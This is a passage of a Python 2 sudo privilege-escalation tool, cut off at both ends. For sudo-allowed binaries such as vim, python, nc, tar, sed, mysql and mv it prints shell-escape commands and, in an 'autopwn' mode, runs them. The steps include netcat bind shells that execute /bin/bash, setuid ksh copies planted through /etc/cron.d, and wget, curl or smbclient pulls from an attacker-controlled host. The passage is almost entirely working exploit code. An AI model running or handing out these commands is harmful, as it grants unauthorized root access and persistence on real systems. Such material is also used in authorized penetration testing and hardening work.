| if args.info: 729 | print OKYELLOW + "\n-----------------------------------------------------------------------------------------------------------------------------" + ENDC 730 | print OKYELLOW + "\n[!] HOW TO PWN THIS RULE!!!" + ENDC 731 | print OKBLUE + "[+] To pwn this rule type the following command: " + ENDC 732 | if (vim_user == "ALL") or (vim_user == "root"): 733 | print OKRED + "[*] sudo vim -c ':shell'" + ENDC 734 | else: 735 | print OKRED + "[*] sudo -u " + vim_user + " vim -c ':shell'" + ENDC 736 | print OKYELLOW + "\n-----------------------------------------------------------------------------------------------------------------------------\n" + ENDC 737 | sys.exit() 738 | 739 | elif args.autopwn: 740 | 741 | question = ask_user( OKRED + "\n[?] DO you wish to abise the vim rule? " + ENDC) 742 | 743 | if question == True: 744 | 745 | print OKGREEN + "\n[!] Pwning the vim rule now!!!" + ENDC 746 | 747 | if (vim_user == "ALL") or (vim_user == "root"): 748 | print OKGREEN + "\n[!] Obtaining shell as root!" + ENDC 749 | call("sudo vim -c ':shell'", shell=True) 750 | else: 751 | print OKGREEN + "\n[!] Obtaining shell as " + vim_user + "!" + ENDC 752 | call("sudo -u " + vim_user + " vim -c ':shell'", shell=True) 753 | 754 | if question == False: 755 | sudopwner() 756 | 757 | 758 | # SUDO python Rule Pwnage 759 | def python(python_user): 760 | 761 | if args.info: 762 | print OKYELLOW + "\n-----------------------------------------------------------------------------------------------------------------------------" + ENDC 763 | print OKYELLOW + "\n[!] HOW TO PWN THIS RULE!!!" + ENDC 764 | print OKBLUE + "[+] To pwn this rule multiple steps need to be taken." + ENDC 765 | print OKBLUE + "[1] First create a malicious python script: " + ENDC 766 | print OKRED + " [*] echo 'os.system('/bin/bash)' > /tmp/pwnage.py" + ENDC 767 | print OKBLUE + "[2] Finally execute that python script to get your shell: " + ENDC 768 | if (python_user == "ALL") or (python_user == "root"): 769 | print OKRED + " [*] sudo python /tmp/pwnage.py" + ENDC 770 | else: 771 | print OKRED + " [*] sudo -u " + python_user + " python /tmp/pwnage.py" + ENDC 772 | print OKYELLOW + "\n-----------------------------------------------------------------------------------------------------------------------------\n" + ENDC 773 | sys.exit() 774 | 775 | elif args.autopwn: 776 | 777 | question = ask_user( OKRED + "\n[?] Do you wish to abuse the python rule? " + ENDC) 778 | 779 | if question == True: 780 | 781 | print OKGREEN + "\n[!] Pwning the python rule now!!!" + ENDC 782 | print OKGREEN + "\n[!] Creating the malcious file now!" + ENDC 783 | 784 | call("echo 'os.system('/bin/bash')' > /tmp/pwnage.py", shell=True) 785 | 786 | print OKGREEN + "\n[!] Obtaining shell!" + ENDC 787 | 788 | if (python_user == "ALL") or (python_user == "root"): 789 | print OKGREEN + "\n[!] Obtaining shell as root!" + ENDC 790 | call("sudo python /tmp/pwnage.py", shell=True) 791 | else: 792 | print OKGREEN + "\n[!] Obtaining shell as " + python_user + "!" + ENDC 793 | call("sudo -u " + python_user + " python /tmp/pwnage.py", shell=True) 794 | 795 | if question == False: 796 | sudopwner() 797 | 798 | 799 | # SUDO perl Rule Pwnage 800 | def perl(perl_user): 801 | 802 | if args.info: 803 | print OKYELLOW + "\n-----------------------------------------------------------------------------------------------------------------------------" + ENDC 804 | print OKYELLOW + "\n[!] HOW TO PWN THIS RULE!!!" + ENDC 805 | print OKBLUE + "[+] To pwn this rule multiple steps need to be taken." + ENDC 806 | print OKBLUE + "[1] First create a malicious perl script: " + ENDC 807 | print OKRED + " [*] echo 'exec '/bin/bash';' > /tmp/pwnage.pl" + ENDC 808 | print OKBLUE + "[2] Finally execute that perl script to get your shell: " + ENDC 809 | if (perl_user == "ALL") or (perl_user == "root"): 810 | print OKRED + " [*] sudo perl /tmp/pwnage.pl" + ENDC 811 | else: 812 | print OKRED + " [*] sudo -u " + perl_user + " perl /tmp/pwnage.pl" + ENDC 813 | print OKYELLOW + "\n-----------------------------------------------------------------------------------------------------------------------------\n" + ENDC 814 | sys.exit() 815 | 816 | elif args.autopwn: 817 | 818 | question = ask_user( OKRED + "\n[?] Do you wish to abuse the perl rule? " + ENDC) 819 | 820 | if question == True: 821 | 822 | print OKGREEN + "\n[!] Pwning the perl rule now!!!" + ENDC 823 | print OKGREEN + "\n[!] Creating the malicious file now!" + ENDC 824 | 825 | call("echo 'exec '/bin/bash';' > /tmp/pwn.pl", shell=True) 826 | 827 | print OKGREEN + "\n[!] Obtaining shell!" + ENDC 828 | 829 | if (perl_user == "ALL") or (perl_user == "root"): 830 | print OKGREEN + "\n[!] Obtaining shell as root!" + ENDC 831 | call("sudo perl /tmp/pwn.pl", shell=True) 832 | else: 833 | print OKGREEN + "\n[!] Obtaining shell as " + perl_user + "!" + ENDC 834 | call("sudo -u " + perl_user + " perl /tmp/pwn.pl", shell=True) 835 | 836 | if question == False: 837 | sudopwner() 838 | 839 | 840 | # SUDO ruby Rule Pwnage 841 | def ruby(ruby_user): 842 | 843 | if args.info: 844 | print OKYELLOW + "\n-----------------------------------------------------------------------------------------------------------------------------" + ENDC 845 | print OKYELLOW + "\n[!] HOW TO PWN THIS RULE!!!" + ENDC 846 | print OKBLUE + "[+] To pwn this rule multiple steps need to be taken." + ENDC 847 | print OKBLUE + "[1] First create a malicious ruby script: " + ENDC 848 | print OKRED + " [*] echo 'exec '/bin/bash';' > /tmp/pwnage.rb" + ENDC 849 | print OKBLUE + "[2] Finally execute that ruby script to get your shell: " + ENDC 850 | if (ruby_user == "ALL") or (ruby_user == "root"): 851 | print OKRED + " [*] sudo ruby /tmp/pwnage.rb" + ENDC 852 | else: 853 | print OKRED + " [*] sudo -u " + ruby_user + " ruby /tmp/pwnage.rb" + ENDC 854 | print OKYELLOW + "\n-----------------------------------------------------------------------------------------------------------------------------\n" + ENDC 855 | sys.exit() 856 | 857 | elif args.autopwn: 858 | 859 | question = ask_user( OKRED + "\n[?] Do you wish to abuse the ruby rule? " + ENDC) 860 | 861 | if question == True: 862 | 863 | print OKGREEN + "[!] Pwning the ruby rule now!!!" + ENDC 864 | print OKGREEN + "[!] Creating the malicious file now!" + ENDC 865 | 866 | call("echo 'exec '/bin/bash';' > /tmp/pwn.rb", shell=True) 867 | 868 | print OKGREEN + "[!] Obtaining shell!" + ENDC 869 | 870 | if (ruby_user == "ALL") or (ruby_user == "root"): 871 | print OKGREEN + "\n[!] Obtaining shell as root!" + ENDC 872 | call("sudo ruby /tmp/pwn.rb", shell=True) 873 | else: 874 | print OKGREEN + "\n[!] Obtianing shell as " + ruby_user + "!" + ENDC 875 | call("sudo -u " + ruby_user + " ruby /tmp/pwn.rb", shell=True) 876 | 877 | if question == False: 878 | sudopwner() 879 | 880 | # SUDO bash Rule Pwnage 881 | def bash(bash_user): 882 | 883 | if args.info: 884 | print OKYELLOW + "\n-----------------------------------------------------------------------------------------------------------------------------" + ENDC 885 | print OKYELLOW + "\n[!] HOW TO PWN THIS RULE!!!" + ENDC 886 | print OKBLUE + "[+] To pwn this rule type the following command: " + ENDC 887 | if (bash_user == "ALL") or (bash_user == "root"): 888 | print OKRED + "[*] sudo bash -i" + ENDC 889 | else: 890 | print OKRED + "[*] sudo -u " + bash_user + " bash -i" + ENDC 891 | print OKYELLOW + "\n-----------------------------------------------------------------------------------------------------------------------------\n" + ENDC 892 | sys.exit() 893 | 894 | elif args.autopwn: 895 | 896 | question = ask_user( OKRED + "\n[?] Do you wish to abuse the bash rule? " + ENDC) 897 | 898 | if question == True: 899 | 900 | print OKGREEN + "[!] Pwning the bash rule now!!!" + ENDC 901 | print OKGREEN + "[+] Obtaining bash shell by passing the -i argument!" + ENDC 902 | 903 | if (bash_user == "ALL") or (bash_user == "root"): 904 | print OKGREEN + "\n[!] Obtaining shell as root!" + ENDC 905 | call("sudo bash -i", shell=True) 906 | else: 907 | print OKGREEN + "\n[!] Obtaining shell as " + bash_user + "!" + ENDC 908 | call("sudo -u " + bash_user + " bash -i", shell=True) 909 | 910 | if question == False: 911 | sudopwner() 912 | 913 | 914 | # SUDO nc Rule Pwnage 915 | def nc(nc_user): 916 | 917 | if args.info: 918 | print OKYELLOW + "\n-----------------------------------------------------------------------------------------------------------------------------" + ENDC 919 | print OKYELLOW + "\n[!] HOW TO PWN THIS RULE!!!" + ENDC 920 | print OKBLUE + "[+] To pwn this rule multiple steps need to be taken." + ENDC 921 | print OKBLUE + "[1] First open a port using sudo and background it so you can connect to it in the same terminal: " + ENDC 922 | if (nc_user == "ALL") or (nc_user == "root"): 923 | print OKRED + " [*] sudo /bin/nc -lvp 8888 -e '/bin/bash' &" + ENDC 924 | print OKBLUE + "[2] Finally connect to that port using sudo: " + ENDC 925 | print OKRED + " [*] sudo /bin/nc -vvv 127.0.0.1 8888" + ENDC 926 | else: 927 | print OKRED + " [*] sudo -u " + nc_user + " /bin/nc -lvp 8888 -e '/bin/bash' &" + ENDC 928 | print OKBLUE + "[2] Finally connect to that port using sudo: " + ENDC 929 | print OKRED + " [*] sudo -u " + nc_user + " /bin/nc -vvv 127.0.0.1 8888" + ENDC 930 | print OKYELLOW + "\n-----------------------------------------------------------------------------------------------------------------------------\n" + ENDC 931 | sys.exit() 932 | 933 | elif args.autopwn: 934 | 935 | question = ask_user(OKRED + "\n[?] Do you wish to abuse the nc rule? " + ENDC) 936 | 937 | if question == True: 938 | 939 | print OKGREEN + "[!] Pwning the nc rule now!!!" + ENDC 940 | if (nc_user == "ALL") or (nc_user == "root"): 941 | print OKGREEN + "[!] Opening port on 8888 as root" + ENDC 942 | call("sudo /bin/nc -lvp 8888 -e '/bin/bash' &", shell=True) 943 | 944 | print OKGREEN + "[!] Connecting to port on 8888 to obtain root shell!" + ENDC 945 | call("sudo /bin/nc -vvv 127.0.0.1 8888", shell=True) 946 | else: 947 | print OKGREEN + "[!] Opening port on 8888 as " + nc_user + ENDC 948 | call("sudo -u " + nc_user + " /bin/nc -lvp 8888 -e '/bin/bash' &", shell=True) 949 | 950 | print OKGREEN + "[!] Connecting to port 8888 to obtain shell as " + nc_user + "!" + ENDC 951 | call("sudo -u " + nc_user + " /bin/nc -vvv 127.0.0.1 8888", shell=True) 952 | 953 | 954 | if question == False: 955 | sudopwner() 956 | 957 | 958 | # SUDO less Rule Pwnage 959 | def less(less_user): 960 | 961 | print OKRED + "\n-----------------------------------------------------------------------------------------------------------------------------" + ENDC 962 | print OKYELLOW + "\n[!] NO AUTO PWNAGE AVAILABLE.... FOLLOW BELOW STEPS TO PWN: " + ENDC 963 | print OKBLUE + "[1] The first step is to open a file using the 'less' command: " + ENDC 964 | if (less_user == "ALL") or (less_user == "root"): 965 | print OKRED + " [*] sudo less " + ENDC 966 | else: 967 | print OKRED + " [*] sudo -u " + less_user + " less " + ENDC 968 | print OKBLUE + "[2] Once the file is open type '!/bin/bash': " + ENDC 969 | print OKRED + " [*] !/bin/bash" + ENDC 970 | print OKRED + "\n-----------------------------------------------------------------------------------------------------------------------------\n" + ENDC 971 | sys.exit() 972 | 973 | 974 | # SUDO more Rule Pwnage 975 | def more(more_user): 976 | 977 | print OKRED + "\n-----------------------------------------------------------------------------------------------------------------------------" + ENDC 978 | print OKYELLOW + "\n[!] NO AUTO PWNAGE AVAILABLE.... FOLLOW BELOW STEPS TO PWN: " + ENDC 979 | print OKBLUE + "[1] The first step is to open a file using the 'more' command: " + ENDC 980 | if (more_user == "ALL") or (more_user == "root"): 981 | print OKRED + " [*] sudo more " + ENDC 982 | else: 983 | print OKRED + " [*] sudo -u " + more_user + " more " + ENDC 984 | print OKBLUE + "[2] Once the file is open type '!/bin/bash': " + ENDC 985 | print OKRED + " [*] !/bin/bash" + ENDC 986 | print OKRED + "\n-----------------------------------------------------------------------------------------------------------------------------\n" + ENDC 987 | sys.exit() 988 | 989 | 990 | # SUDO man Rule Pwnage 991 | def man(man_user): 992 | 993 | print OKRED + "\n-----------------------------------------------------------------------------------------------------------------------------" + ENDC 994 | print OKYELLOW + "\n[!] NO AUTO PWNAGE AVAILABLE.... FOLLOW BELOW STEPS TO PWN: " + ENDC 995 | print OKBLUE + "[1] The first step is to view the man page of a Linux command: " + ENDC 996 | if (man_user == "ALL") or (man_user == "root"): 997 | print OKRED + " [*] sudo man bash" + ENDC 998 | else: 999 | print OKRED + " [*] sudo -u " + man_user + " man bash" + ENDC 1000 | print OKBLUE + "[2] Once the page is open type '!/bin/bash': " + ENDC 1001 | print OKRED + " [*] !/bin/bash" + ENDC 1002 | print OKRED + "\n-----------------------------------------------------------------------------------------------------------------------------\n" + ENDC 1003 | sys.exit() 1004 | 1005 | 1006 | # SUDO gdb Rule Pwnage 1007 | def gdb(gdb_user): 1008 | 1009 | if args.info: 1010 | print OKYELLOW + "\n-----------------------------------------------------------------------------------------------------------------------------" + ENDC 1011 | print OKYELLOW + "\n[!] HOW TO PWN THIS RULE!!!" + ENDC 1012 | print OKBLUE + "[+] To pwn this rule multiple steps need to be taken." + ENDC 1013 | print OKBLUE + "[1] First create a malicious sh script to execute with gdb: " + ENDC 1014 | print OKRED + " [*] echo '!/bin/bash' > /tmp/pwnage.sh" + ENDC 1015 | print OKBLUE + "[2] Finally execute the script with gdb: " + ENDC 1016 | if (gdb_user == "ALL") or (gdb_user == "root"): 1017 | print OKRED + " [*] sudo gdb -batch -x /tmp/pwnage.sh" + ENDC 1018 | else: 1019 | print OKRED + " [*] sudo -u " + gdb_user + " gdb -batch -x /tmp/pwnage.sh" + ENDC 1020 | print OKYELLOW + "\n-----------------------------------------------------------------------------------------------------------------------------\n" + ENDC 1021 | sys.exit() 1022 | 1023 | elif args.autopwn: 1024 | 1025 | question = ask_user(OKRED + "\n[?] Do you wish to abuse the gdb rule? " + ENDC) 1026 | 1027 | if question == True: 1028 | 1029 | print OKGREEN + "[!] Pwning the gdb rule now!!!" + ENDC 1030 | print OKGREEN + "[!] Creating malicious file now!" + ENDC 1031 | call("echo '!/bin/bash' > /tmp/pwnage.sh", shell=True) 1032 | 1033 | if (gdb_user == "ALL") or (gdb_user == "root"): 1034 | print OKGREEN + "[!] Executing malicious script with gdb and getting root shell!" + ENDC 1035 | call("sudo gdb -batch -x /tmp/pwnage.sh", shell=True) 1036 | else: 1037 | print OKGREEN + "[!] Executing malicious script with gdb and getting shell as " + gdb_user + "!" + ENDC 1038 | call("sudo -u " + gdb_user + " gdb -batch -x /tmp/pwnage.sh", shell=True) 1039 | 1040 | if question == False: 1041 | sudopwner() 1042 | 1043 | 1044 | # SUDO ftp Rule Pwnage 1045 | def ftp(ftp_user): 1046 | 1047 | # ADD AUTO PWNAGE STEPS 1048 | 1049 | print OKRED + "\n-----------------------------------------------------------------------------------------------------------------------------" + ENDC 1050 | print OKYELLOW + "\n[!] NO AUTO PWNAGE AVAILABLE.... FOLLOW BELOW STEPS TO PWN: " + ENDC 1051 | print OKBLUE + "[1] The first step is to execute the 'ftp' command: " + ENDC 1052 | if (ftp_user == "ALL") or (ftp_user == "root"): 1053 | print OKRED + " [*] sudo ftp" + ENDC 1054 | else: 1055 | print OKRED + " [*] sudo -u " + ftp_user + " ftp" + ENDC 1056 | print OKBLUE + "[2] Once in the ftp prompt type the following: " + ENDC 1057 | print OKRED + " [*] !/bin/bash" + ENDC 1058 | print OKRED + "\n-----------------------------------------------------------------------------------------------------------------------------\n" + ENDC 1059 | sys.exit() 1060 | 1061 | 1062 | # SUDO smbclient Rule Pwnage 1063 | def smbclient(smbclient_user): 1064 | 1065 | # ADD AUTO PWNAGE STEPS 1066 | 1067 | print OKRED + "\n-----------------------------------------------------------------------------------------------------------------------------" + ENDC 1068 | print OKYELLOW + "\n[!] NO AUTO PWNAGE AVAILABLE.... FOLLOW BELOW STEPS TO PWN: " + ENDC 1069 | print OKBLUE + "[1] Execute the 'smbclient' command, connecting to a valid SMB or CIFS share: " + ENDC 1070 | if (smbclient_user == "ALL") or (smbclient_user == "root"): 1071 | print OKRED + " [*] sudo smbclient \\\\\\\\attacker-ip\\\\share-name -U username" + ENDC 1072 | else: 1073 | print OKRED + " [*] sudo -u " + smbclient_user + " smbclient \\\\\\\\attacker-ip\\\\share-name -U username" + ENDC 1074 | print OKBLUE + "[2] Once in the smbclient prompt (smb: \>), type the following: " + ENDC 1075 | print OKRED + " [*] !/bin/bash" + ENDC 1076 | print OKRED + "\n-----------------------------------------------------------------------------------------------------------------------------\n" + ENDC 1077 | sys.exit() 1078 | 1079 | 1080 | # SUDO sed Rule Pwnage 1081 | def sed(sed_user): 1082 | 1083 | if args.info: 1084 | print OKYELLOW + "\n-----------------------------------------------------------------------------------------------------------------------------" + ENDC 1085 | print OKYELLOW + "\n[!] HOW TO PWN THIS RULE!!!" + ENDC 1086 | print OKBLUE + "[+] To pwn this rule we must use a insane argument that is only document in one place.... 'info sed' lol: " + ENDC 1087 | if (sed_user == "ALL") or (sed_user == "root"): 1088 | print OKRED + " [*] sudo sed e" + ENDC 1089 | else: 1090 | print OKRED + " [*] sudo -u " + sed_user + " sed e" + ENDC 1091 | print OKYELLOW + "\n-----------------------------------------------------------------------------------------------------------------------------\n" + ENDC 1092 | sys.exit() 1093 | 1094 | elif args.autopwn: 1095 | 1096 | question = ask_user(OKRED + "\n[?] Do you wish to abuse the sed rule? " + ENDC) 1097 | 1098 | if question == True: 1099 | 1100 | print OKGREEN + "[!] Pwning the sed rule now!!!" + ENDC 1101 | 1102 | if (sed_user == "ALL") or (sed_user == "root"): 1103 | print OKGREEN + "[!] Running sed with crazy 'e' argument to get root shell!" + ENDC 1104 | call("sudo sed e", shell=True) 1105 | else: 1106 | print OKGREEN + "[!] Running sed with crazy 'e' argument to get shell as " + sed_user + "!" + ENDC 1107 | call("sudo -u " + sed_user + " sed e", shell=True) 1108 | 1109 | if question == False: 1110 | sudopwner() 1111 | 1112 | 1113 | # SUDO mysql Rule Pwnage 1114 | def mysql(mysql_user): 1115 | 1116 | if args.info: 1117 | print OKYELLOW + "\n-----------------------------------------------------------------------------------------------------------------------------" + ENDC 1118 | print OKYELLOW + "\n[!] HOW TO PWN THIS RULE!!!" + ENDC 1119 | print OKBLUE + "[+] To pwn this rule we will execute mysql with the -e argument to execute system command: " + ENDC 1120 | if (mysql_user == "ALL") or (mysql_user == "root"): 1121 | print OKRED + " [*] sudo mysql -e '\! /bin/bash'" + ENDC 1122 | else: 1123 | print OKRED + " [*] sudo -u " + mysql_user + " mysql -e '\! /bin/bash'" + ENDC 1124 | print OKYELLOW + "\n-----------------------------------------------------------------------------------------------------------------------------\n" + ENDC 1125 | sys.exit() 1126 | 1127 | elif args.autopwn: 1128 | 1129 | question = ask_user(OKRED + "\n[?] Do you wish to abuse the mysql rule? " + ENDC) 1130 | 1131 | if question == True: 1132 | 1133 | print OKGREEN + "[!] Pwning the mysql rule now!!!" + ENDC 1134 | 1135 | if (mysql_user == "ALL") or (mysql_user == "root"): 1136 | print OKGREEN + "[!] Running mysql command with -e argument to get root shell!" + ENDC 1137 | call("sudo mysql -e '\! /bin/bash'", shell=True) 1138 | else: 1139 | print OKGREEN + "[!] Running mysql command with -e argument to get shell as " + mysql_user + "!" + ENDC 1140 | call("sudo -u " + mysql_user + " mysql -e '\! /bin/bash'", shell=True) 1141 | 1142 | if question == False: 1143 | sudopwner() 1144 | 1145 | 1146 | # SUDO tar Rule Pwnage 1147 | def tar(tar_user): 1148 | 1149 | if args.info: 1150 | print OKYELLOW + "\n-----------------------------------------------------------------------------------------------------------------------------" + ENDC 1151 | print OKYELLOW + "\n[!] HOW TO PWN THIS RULE!!!" + ENDC 1152 | print OKBLUE + "[+] To pwn this rule we will execute tar with the checkpoint and checkpoint-action argument to execute system command: " + ENDC 1153 | if (tar_user == "ALL") or (tar_user == "root"): 1154 | print OKRED + " [*] sudo tar cf /dev/null /tmp/pwnage --checkpoint=1 --checkpoint-action=exec=/bin/bash" + ENDC 1155 | else: 1156 | print OKRED + " [*] sudo -u " + tar_user + " tar cf /dev/null /tmp/pwnage --checkpoint=1 --checkpoint-action=exec=/bin/bash" + ENDC 1157 | print OKYELLOW + "\n-----------------------------------------------------------------------------------------------------------------------------\n" + ENDC 1158 | sys.exit() 1159 | 1160 | elif args.autopwn: 1161 | 1162 | question = ask_user(OKRED + "\n[?] Do you wish to abuse the tar rule? " + ENDC) 1163 | 1164 | if question == True: 1165 | 1166 | print OKGREEN + "[!] Pwning the tar rule now!!!" + ENDC 1167 | 1168 | if (tar_user == "ALL") or (tar_user == "root"): 1169 | print OKGREEN + "[!] Running tar command with the checkpoint and checkpoint-action arguments to get root shell!" + ENDC 1170 | call("sudo tar cf /dev/null /tmp/pwnage --checkpoint=1 --checkpoint-action=exec=/bin/bash", shell=True) 1171 | else: 1172 | print OKGREEN + "[!] Running tar command with the checkpoint and checkpoint-action arguments to get shell as " + tar_user + "!" + ENDC 1173 | call("sudo -u " + tar_user + " tar cf /dev/null /tmp/pwnage --checkpoint=1 --checkpoint-action=exec=/bin/bash", shell=True) 1174 | 1175 | if question == False: 1176 | sudopwner() 1177 | 1178 | 1179 | # SUDO wget Rule Pwnage 1180 | def wget(): 1181 | 1182 | print OKRED + "\n-----------------------------------------------------------------------------------------------------------------------------" + ENDC 1183 | print OKYELLOW + "\n[!] NO AUTO PWNAGE AVAILABLE.... FOLLOW BELOW STEPS TO PWN!!!" + ENDC 1184 | print OKBLUE + "[+] To pwn this rule multiple steps need to be taken." + ENDC 1185 | print OKBLUE + "[1] First create a malicious script locally that will be executed by cron: " + ENDC 1186 | print OKRED + " [*] echo 'cp /bin/ksh /tmp/pwnage ; chmod 4777 /tmp/pwnage' > /tmp/pwnage.sh" + ENDC 1187 | print OKBLUE + "[2] Next change the rights to that malicious file to be executable: " + ENDC 1188 | print OKRED + " [*] chmod +x /tmp/pwnage.sh" + ENDC 1189 | print OKBLUE + "[3] Next we need to create a file in a web directory we control containing the file we will pull down and place in cron.d: " + ENDC 1190 | print OKRED + " [*] Place this in a web directory you control: */1 * * * * root /tmp/pwnage.sh" + ENDC 1191 | print OKBLUE + "[4] Next we need to pull that file down into /etc/cron.d: " + ENDC 1192 | print OKRED + " [*] sudo wget http:///pwnage -P /etc/cron.d/" + ENDC 1193 | print OKBLUE + "[5] Finally we wait until the file pwnage is executed in cron.d and a setuid binary is created in /tmp/" + ENDC 1194 | print OKRED + "\n-----------------------------------------------------------------------------------------------------------------------------\n" + ENDC 1195 | sys.exit() 1196 | 1197 | 1198 | # SUDO curl Rule Pwnage 1199 | def curl(): 1200 | 1201 | print OKRED + "\n-----------------------------------------------------------------------------------------------------------------------------" + ENDC 1202 | print OKYELLOW + "\n[!] NO AUTO PWNAGE AVAILABLE.... FOLLOW BELOW STEPS TO PWN!!!" + ENDC 1203 | print OKBLUE + "[+] To pwn this rule multiple steps need to be taken." + ENDC 1204 | print OKBLUE + "[1] First create a malicious script locally that will be executed by cron: " + ENDC 1205 | print OKRED + " [*] echo 'cp /bin/ksh /tmp/pwnage ; chmod 4777 /tmp/pwnage' > /tmp/pwnage.sh" + ENDC 1206 | print OKBLUE + "[2] Next change the rights to that malicious file to be executable: " + ENDC 1207 | print OKRED + " [*] chmod +x /tmp/pwnage.sh" + ENDC 1208 | print OKBLUE + "[3] Next we need to create a file in a web directory we control containing the file we will pull down and place in cron.d: " + ENDC 1209 | print OKRED + " [*] Place this in a web directory you control: */1 * * * * root /tmp/pwnage.sh" + ENDC 1210 | print OKBLUE + "[4] Next we need to pull that file down into /etc/cron.d: " + ENDC 1211 | print OKRED + " [*] sudo curl http:///pwnage -o /etc/cron.d/pwnage" + ENDC 1212 | print OKBLUE + "[5] Finally we wait until the file pwnage is executed in cron.d and a setuid binary is created in /tmp/" + ENDC 1213 | print OKRED + "\n-----------------------------------------------------------------------------------------------------------------------------\n" + ENDC 1214 | sys.exit() 1215 | 1216 | 1217 | # SUDO mv Rule Pwnage 1218 | def mv(): 1219 | 1220 | if args.info: 1221 | print OKYELLOW + "\n-----------------------------------------------------------------------------------------------------------------------------" + ENDC 1222 | print OKBLUE + "[+] To pwn this rule multiple steps need to be taken." + ENDC 1223 | print OKBLUE + "[1] First create a malicious script locally that will be executed by cron: " + ENDC 1224 | print OKRED + " [*] echo 'cp /bin/ksh /tmp/pwnage ; chmod 4777 /tmp/pwnage' > /tmp/evil.sh" + ENDC 1225 | print OKBLUE + "[2] Next change the rights to that malicious file to be executable: " + ENDC 1226 | print OKRED + " [*] chmod +x /tmp/evil.sh" + ENDC 1227 | print OKBLUE + "[3] Next we need to create a file that will be placed in /etc/cron.d/ that will be executed: " + ENDC 1228 | print OKRED + " [*] echo '*/1 * * * * root /tmp/evil.sh' > /tmp/pwncron" + ENDC 1229 | print OKBLUE + "[4] Next we need to put that file into /etc/cron.d: " + ENDC 1230 | print OKRED + " [*] sudo mv /tmp/pwncron /etc/cron.d/pwncron" + ENDC 1231 | print OKBLUE + "[5] Finally we wait until the file pwnage is executed in cron.d and a setuid binary is created in /tmp/" + ENDC 1232 | print OKYELLOW + "\n-----------------------------------------------------------------------------------------------------------------------------\n" + ENDC 1233 | sys.exit() 1234 | 1235 | elif args.autopwn: 1236 | 1237 | question = ask_user(OKRED + "\n[?] Do you wish to abuse the mv rule? " + ENDC) 1238 | 1239 | if question == True: 1240 | 1241 | print OKGREEN + "\n[!] Pwning the mv rule now!!!" + ENDC 1242 | print OKGREEN + "\n[!] Creating malicious file!" + ENDC 1243 | call("echo 'cp /bin/ksh /tmp/pwnage ; chmod 4777 /tmp/pwnage' > /tmp/evil.sh", shell=True) 1244 | call("chmod +x /tmp/evil.sh", shell=True) 1245 | 1246 | sleep(0.5) 1247 | 1248 | print OKGREEN + "\n[!] Creating malicious cron file!" + ENDC 1249 | call("echo '*/1 * * * * root /tmp/evil.sh' > /tmp/pwncron",shell=True) 1250 | 1251 | sleep(0.5) 1252 | 1253 | print OKGREEN + "\n[!] Running mv command tp move pwncron to /etc/cron.d/!" + ENDC 1254 | call("sudo mv /tmp/pwncron /etc/cron.d/pwncron", shell=True) 1255 | 1256 | print OKGREEN + "\n[!] Wait for pwncron to run in 1 minute!" + ENDC 1257 | print OKGREEN + "\n[!] EXECUTE /tmp/pwnage TO GET SHELL!" + ENDC 1258 | 1259 | if question == False: 1260 | sudopwner() 1261 | 1262 | 1263 | # SUDO tee Rule Pwnage 1264 | def tee(): 1265 | 1266 | print OKRED + "\n-----------------------------------------------------------------------------------------------------------------------------" + ENDC 1267 | print OKYELLOW + "\n[!] NO AUTO PWNAGE AVAILABLE.... FOLLOW BELOW STEPS TO PWN!!!" + ENDC 1268 | print OKBLUE + "[+] To pwn this rule multiple steps need to be taken." + ENDC 1269 | print OKBLUE + "[1] First create a malicious script locally that will be executed by cron: " + ENDC 1270 | print OKRED + " [*] echo 'cp /bin/ksh /tmp/pwnage ; chmod 4777 /tmp/pwnage' > /tmp/pwnage.sh" + ENDC 1271 | print OKBLUE + "[2] Next change the rights to that malicious file to be executable: " + ENDC 1272 | print OKRED + " [*] chmod +x /tmp/pwnage.sh" + ENDC 1273 | print OKBLUE + "[3] Next we need to create a file in /etc/cron.d/ with the tee command: " + ENDC 1274 | print OKRED + " [*] sudo tee -a /etc/cron.d/pwn" + ENDC 1275 | print OKBLUE + "[4] Enter the below data, hit enter, and exit the tee command: " + ENDC 1276 | print OKRED + " [*] */1 * * * * root /tmp/pwnage.sh" + ENDC 1277 | print OKBLUE + "[5] Finally we wait until the file pwnage is executed in cron.d and a setuid binary is created in /tmp/" + ENDC 1278 | print OKRED + "\n-----------------------------------------------------------------------------------------------------------------------------\n" + ENDC 1279 | sys.exit() 1280 | 1281 | 1282 | # SUDO scp Rule Pwnage 1283 | def scp(): 1284 | 1285 | print OKRED + "\n-----------------------------------------------------------------------------------------------------------------------------" + ENDC 1286 | print OKYELLOW + "\n[!] NO AUTO PWNAGE AVAILABLE.... FOLLOW BELOW STEPS TO PWN!!!" + ENDC 1287 | print OKBLUE + "[+] To pwn this rule multiple steps need to be taken." + ENDC 1288 | print OKBLUE + "[1] First create a malicious script locally that will be executed by cron: " + ENDC 1289 | print OKRED + " [*] echo 'cp /bin/ksh /tmp/pwnage ; chmod 4777 /tmp/pwnage' > /tmp/pwnage.sh" + ENDC 1290 | print OKBLUE + "[2] Next change the rights to that malicious file to be executable: " + ENDC 1291 | print OKRED + " [*] chmod +x /tmp/pwnage.sh" + ENDC 1292 | print OKBLUE + "[3] Next we need to create a file on a remote machine that will be pulled into /etc/cron.d/: " + ENDC 1293 | print OKRED + " [*] echo '*/1 * * * * root /tmp/evil.sh' > /tmp/pwncron" + ENDC 1294 | print OKBLUE + "[4] Finally we need to scp our pwncron file to our victim /etc/cron.d/ directory: " + ENDC 1295 | print OKRED + " [*] sudo scp @:/tmp/pwncron /etc/cron.d/pwncron" + ENDC 1296 | print OKBLUE + "[5] Finally we wait until the file pwnage is executed in cron.d and a setuid binary is created in /tmp/" + ENDC 1297 | print OKRED + "\n-----------------------------------------------------------------------------------------------------------------------------\n" + ENDC 1298 | sys.exit() 1299 | 1300 | 1301 | # SUDO ssh Rule Pwnage 1302 | def ssh(ssh_user): 1303 | 1304 | if args.info: 1305 | print OKYELLOW + "\n-----------------------------------------------------------------------------------------------------------------------------" + ENDC 1306 | print OKBLUE + "[+] To pwn this rule multiple steps need to be taken." + ENDC 1307 | print OKBLUE + "[1] First create a malicious script locally that will be executed by ssh." + ENDC 1308 | print OKRED + " [*] echo 'cp /bin/ksh /tmp/pwnage ; chmod 4777 /tmp/pwnage' > /tmp/evil.sh" + ENDC 1309 | print OKBLUE + "[2] Next change the rights to that malicious file to be executable: " + ENDC 1310 | print OKRED + " [*] chmod +x /tmp/evil.sh" + ENDC 1311 | print OKBLUE + "[3] Next we need to execute SSH with ProxyCommand in order to execute our malicious script: " + ENDC 1312 | if (ssh_user == "ALL") or (ssh_user == "root"): 1313 | print OKRED + " [*] sudo ssh -o ProxyCommand='/tmp/./evil.sh' @localhost" + ENDC 1314 | else: 1315 | print OKRED + " 